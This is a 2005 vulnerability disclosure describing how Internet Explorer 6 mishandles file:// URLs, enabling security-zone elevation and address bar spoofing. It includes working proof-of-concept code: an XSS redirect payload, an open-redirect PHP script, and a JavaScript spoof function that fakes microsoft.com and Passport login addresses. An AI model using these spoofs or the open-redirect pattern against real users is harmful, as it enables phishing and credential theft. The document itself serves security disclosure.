Internet Explorer inconsistent file protocol handling


Yorick Koster, August 2005

Tested software


The following versions were tested and confirmed to be affected.

   * Internet Explorer 6.0 SP1 (Windows 2000 Professional SP4)
   * Internet Explorer 6.0 SP2 (Windows XP Professional SP2)

Please note that Internet Explorer on Windows XP reacts differently than Internet Explorer on Windows 2000.

Loading local files


Make sure you have a file named test.html in your root directory before trying to use the examples below. For example:

<html>
<body>
   <script>document.write(document.location);</script>
</body>
</html>


As is well known, linking to arbitrary files on the local computer is not allowed. For example clicking the following links does not load the file c:\test.html

file://c|/test.html
file://c:/test.html

It appears that by omiting the drive letter from the link, Internet Explorer will happily load the file. The can be observed using the link below:

file:///test.html


Figure 1: file:///test.html on Windows 2000


Figure 2: file:///test.html on Windows XP

The same link will not load when it is opened in a new window. In order to do so, it is possible to load the same link using a redirect.

Zone elevation


As can be seen in Figure 1 and Figure 2, loading the c:\test.html file does not gives use additional privileges (i.e. load a file in a different security zone).

It appears that loading files from the root directory, will cause these files to be loaded in the Internet zone. Further testing has revealed that, on Windows 2000, loading a file from a sub directory will load this file in the local intranet zone. For example:

file:///WINNT/Help/ciadmin.htm


Figure 3: file:///WINNT/Help/ciadmin.htm on Windows 2000

On Windows XP, this trick does not work. On Windows XP, the same page will be loaded in the Internet zone:

file:///WINDOWS/Help/ciadmin.htm


Figure 4: file:///WINDOWS/Help/ciadmin.htm on Windows XP

The following example requires that a sub directory test exists containing a copy of test.html

Because local files can be loaded in the Intranet zone on Windows 2000, we can elevated security zones. This can be done if one of the following conditions is met:

   * We can place an arbitrary file on the local computer with a known (or predictable) location.
   * We can find a local file containing a cross-site scripting vulnerability.

When we have elevated to the local intranet zone, we can easily get into the local computer zone. This can be done by loading the same file again, but this time adding the drive letter to the link. This is demonstrated in the example below:

file:///test/test.html?<script>location.href='file://c|/test/test.html';</script>


Figure 5: file:///test/test.html?<script>location.href='file://c|/test/test.html';</script> on Windows 2000

Running arbitrary code in the local computer zone can be done on Windows 2000, but still requires another vulnerability. Windows XP is not affected by this issue. This is probably related to the issue described below.

Address bar spoofing


It appears that Internet Explorer on Windows XP reacts differently from Internet Explorer on Windows 2000. Looking at Figure 1 and Figure 3 we can see that the address bar shows the location My Computer (Windows 2000). Figure 2 and Figure 4 still show the location of the page containing the file:/// link in the address bar (Windows XP).

Internet Explorer on Windows XP does not update its address bar when loading the file:/// URL. Consequently, we can spoof the address bar on Windows XP. In order to do so, we'll have to find a web site that will accept an URL starting with file:/// and use this URL to redirect or include the URL in its web page. Also, one of the following conditions have to be met:

   * We can place an arbitrary file on the local computer with a known (or predictable) location.
   * We can find a local file containing a cross-site scripting vulnerability.

Example:

http://dw.com.com/redir?destUrl=file:///test.html


Figure 6: address bar spoof of http://dw.com.com on Windows XP

The above example uses redirects. Amongst others, redirects are used by search engines, web mail and e-commerce applications. Other attack scenarios are also possible. For example, in some cases it is possible to sent an HTML email containing a file:/// link to someone using a web mail application. Some applications allow users to add links, for example guest books.

This address bar spoof uses a vulnerability in a web application, which should normally not accept links starting with file://. Furthermore, this attack also requires another vulnerability in order to load arbitrary content

Address bar spoof part II


The following examples are loaded from a network share called 'pub'. These examples are loaded from a computer called 'zeus'. Substitute zeus for a valid computer name or a valid IP address.

Loading arbitrary files from the local computer works using file:/// URLs, but we can also add localhost to these URLs. When Internet Explorer loads file://localhost/ URLs, it will first strip localhost from the URL. Effectively we'll end up with a file:/// URL. This behavior can be seen using the following link and viewing the properties of the error page:

file://localhost/blablablabla


Figure 7: file://localhost/blablablabla on Windows XP

There is a small difference between file:/// and file://localhost/ URLs. The later actually allows us to spoof the address bar on both Windows XP and Windows 2000. Since the localhost part is stripped from the URL, we can actually load files from network shares simply by adding the share to the URL. The following example demonstrates this:

file://localhost\\zeus\pub\index.html


Figure 8: file://localhost\\zeus\pub\index.html on Windows 2000

Please note that this trick does not work very well in many case. The example, as shown in Figure 8, uses a redirect to load the file://localhost/ URL. When using a direct link, Internet Explorer will convert the back slashes into forward ones. This does not trigger the address spoof:

file://localhost////zeus/pub/index.html

The following PHP script is used for the redirect:

<php
   if(isset($_GET['url']))
   {
      header("Location: " . $_GET['url']);
      exit;
   }
   
   header("Location: /index.html");
?>


This address bar spoof requires outgoing SMB connections in order to work. An attacker is probably going to be successfull on large corporate networks. Consequently, this issue also requires a vulnerability in a web application as it uses a redirect containing user input

Address bar spoof part III


Finally, there is a way to spoof the address bar without using a vulnerability in a web application. This spoof can be achieved using a very simple JavaScript function and our redirect script. The JavaScript function looks like this:

function spoof(url, file)
{
   w = window.open(url, '_blank');
   w.location.href = 'redir.php?url=' + file;
}


Using this JavaScript function, we can spoof the address bar as follows:

javascript:spoof('http://www.microsoft.com', 'file:///test.html')


Figure 9: Spoofed www.microsoft.com on Windows XP

It appears that we can show about anything in the address bar. The following will also work:

javascript:spoof('blabla://blablabla', 'file:///test.html')


Figure 10: Spoofed blabla://blablabla on Windows XP

The above does not work on Windows 2000. On Windows 2000, the address bar will show My Computer. It does work using a network share. This is demonstrated in the following example:

javascript:spoof('https://login.passport.neti/uilogin.srf?lc=104&id=2', 'file://localhost\\\\zeus\\pub\\index.html')


Figure 11: Spoofed login.passport.net on Windows 2000

In order to exploit this issue, outgoing SMB connection are required. Everything else is under the attackers control.

Enumerating local files


Finally, using file:/// URLs, it is also possible to enumerate local files.